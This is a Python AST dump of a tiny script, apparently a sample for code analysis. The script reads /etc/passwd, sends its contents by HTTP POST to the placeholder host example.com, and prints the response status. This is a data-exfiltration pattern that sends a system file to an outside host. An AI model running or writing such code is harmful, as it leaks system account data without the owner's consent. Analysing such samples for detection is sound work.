Module(
    body=[
        Import(
            names=[
                alias(name='requests')]),
        With(
            items=[
                withitem(
                    context_expr=Call(
                        func=Name(id='open', ctx=Load()),
                        args=[
                            Constant(value='/etc/passwd'),
                            Constant(value='r')],
                        keywords=[]),
                    optional_vars=Name(id='f', ctx=Store()))],
            body=[
                Assign(
                    targets=[
                        Name(id='content', ctx=Store())],
                    value=Call(
                        func=Attribute(
                            value=Name(id='f', ctx=Load()),
                            attr='read',
                            ctx=Load()),
                        args=[],
                        keywords=[]))]),
        Assign(
            targets=[
                Name(id='response', ctx=Store())],
            value=Call(
                func=Attribute(
                    value=Name(id='requests', ctx=Load()),
                    attr='post',
                    ctx=Load()),
                args=[
                    Constant(value='https://example.com')],
                keywords=[
                    keyword(
                        arg='data',
                        value=Name(id='content', ctx=Load()))])),
        Expr(
            value=Call(
                func=Name(id='print', ctx=Load()),
                args=[
                    Attribute(
                        value=Name(id='response', ctx=Load()),
                        attr='status_code',
                        ctx=Load())],
                keywords=[]))],
    type_ignores=[])